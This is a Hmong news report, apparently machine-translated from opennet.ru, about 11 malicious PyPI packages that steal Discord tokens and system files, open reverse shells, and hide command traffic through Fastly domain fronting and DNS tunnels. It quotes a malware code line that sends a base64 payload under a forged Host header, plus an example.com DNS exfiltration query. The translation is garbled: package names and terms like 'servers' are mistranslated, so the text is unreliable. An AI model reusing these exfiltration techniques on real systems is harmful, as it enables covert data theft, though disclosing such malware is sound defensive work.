Hauv phau ntawv qhia PyPI (Python Package Index), 11 pob khoom uas muaj cov lej tsis zoo raug txheeb xyuas. Ua ntej muaj teeb meem raug txheeb xyuas, cov pob khoom tau rub tawm txog 38 txhiab lub sijhawm hauv tag nrho. Cov pob khoom tsis zoo uas pom tau yog qhov tseem ceeb rau lawv siv txoj hauv kev zoo los nkaum kev sib txuas lus nrog cov neeg tawm tsam cov servers.
- tseem ceeb pob (6305 rub tawm), tseem ceeb-pob (12897) - tsim kev sib txuas rau ib qho chaw sab nraud raws li kev siv ntawm kev txuas mus rau pypi.python.org los muab lub plhaub nkag mus rau lub kaw lus (rov qab plhaub) thiab siv qhov kev pab cuam trevorc2 los nkaum qhov kev sib txuas lus channel.
- pptest (10001), ipboards (946) - siv DNS raws li kev sib txuas lus channel los xa cov ntaub ntawv hais txog lub kaw lus (hauv thawj pob ntawv lub npe tswv, cov npe ua haujlwm, sab hauv thiab sab nraud IP, hauv qhov thib ob - tus neeg siv lub npe thiab tus tswv tsev) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - txheeb xyuas qhov Discord kev pabcuam token hauv qhov system thiab xa mus rau tus tswv tsev sab nraud.
- trrfab (287) - xa tus cim, tus tswv lub npe thiab cov ntsiab lus ntawm /etc/passwd, /etc/hosts, /home mus rau lwm tus tswv tsev.
- 10Cent10 (490) - tsim lub plhaub rov qab txuas nrog tus tswv tsev sab nraud.
- yandex-yt (4183) - tso tawm cov lus hais txog qhov system raug cuam tshuam thiab xa rov qab mus rau nplooj ntawv nrog cov ntaub ntawv ntxiv txog kev nqis tes ua ntxiv los ntawm nda.ya.ru (api.ya.cc).
Ntawm qhov kev ceeb toom tshwj xeeb yog txoj kev nkag mus rau lwm tus tswv siv hauv cov pob khoom tseem ceeb thiab cov pob khoom tseem ceeb, uas tau siv Fastly cov ntsiab lus xa khoom siv hauv PyPI phau ntawv teev npe los zais lawv cov haujlwm. Qhov tseeb, kev thov raug xa mus rau pypi.python.org server (xws li qhia lub npe python.org hauv SNI hauv HTTPS thov), tab sis HTTP "Host" header suav nrog lub npe ntawm server tswj los ntawm cov neeg tawm tsam (sec. forward.io. global.prod.fastly.net). Cov ntsiab lus xa tawm tau xa ib qho kev thov zoo sib xws rau cov neeg rau zaub mov tawm tsam, siv qhov tsis sib xws ntawm TLS kev sib txuas rau pypi.python.org thaum xa cov ntaub ntawv.
PyPI infrastructure yog siv los ntawm Fastly cov ntsiab lus xa tawm network, uas siv lub Varnish pob tshab npe rau cache cov lus thov, thiab tseem siv TLS daim ntawv pov thawj ua tiav ntawm qib CDN, tsis yog qhov kawg servers, xa HTTPS thov los ntawm lub npe. Txawm hais tias lub hom phiaj tus tswv tsev, cov lus thov raug xa mus rau lub npe, uas txiav txim siab tus tswv tsev xav tau siv HTTP "Host" header, thiab cov npe ntawm tus tswv tsev tau khi rau CDN load balancer IP chaw nyob uas raug rau txhua tus neeg siv ceev ceev.
Cov neeg tawm tsam cov neeg rau zaub mov tseem sau npe nrog CDN Fastly, uas muab cov phiaj xwm pub dawb rau txhua tus thiab txawm tso cai rau npe tsis qhia npe. Nws yog ib qho tseem ceeb uas yuav tsum xa cov lus thov mus rau tus neeg raug tsim txom thaum tsim lub "rov qab plhaub", ib txoj kev siv, tab sis pib los ntawm sab ntawm tus neeg tawm tsam tus tswv tsev. Los ntawm sab nraud, kev sib cuam tshuam nrog cov neeg tawm tsam cov neeg rau zaub mov zoo li kev sib tham raug cai nrog PyPI phau ntawv qhia, encrypted siv daim ntawv pov thawj PyPI TLS. Ib qho txheej txheem zoo sib xws, hu ua "domain fronting," yav dhau los tau siv los zais lub npe tswv thaum hla kev thaiv, siv lub peev xwm muab hauv qee qhov CDN tes hauj lwm nkag mus rau HTTPS los ntawm kev qhia tus tswv tsev tsis tseeb hauv SNI thiab tau xa lub npe ntawm lub thov tus tswv hauv HTTP Host header hauv TLS kev sib kho.
Txhawm rau zais kev ua phem, pob TrevorC2 kuj tau siv los ua kev cuam tshuam nrog cov neeg rau zaub mov zoo ib yam li kev siv lub vev xaib ib txwm muaj, piv txwv li, kev thov tsis zoo raug xa mus raws li kev rub tawm cov duab "https://pypi.python.org/images/ guid = "nrog cov ntaub ntawv encoding nyob rau hauv guid parameter. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = thov.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Cov pob pptest thiab ipboards siv txoj hauv kev sib txawv los nkaum kev ua haujlwm hauv network, raws li kev nkag siab cov ntaub ntawv tseem ceeb hauv cov lus nug rau DNS server. Tus malware xa cov ntaub ntawv los ntawm kev ua DNS thov zoo li "nu4timjagq4fimbuhe.example.com", uas cov ntaub ntawv xa mus rau tus tswj server yog encoded siv hom base64 hauv subdomain npe. Tus neeg tawm tsam tau txais cov lus no los ntawm kev tswj hwm DNS server rau example.com sau.
Tau qhov twg los: opennet.ru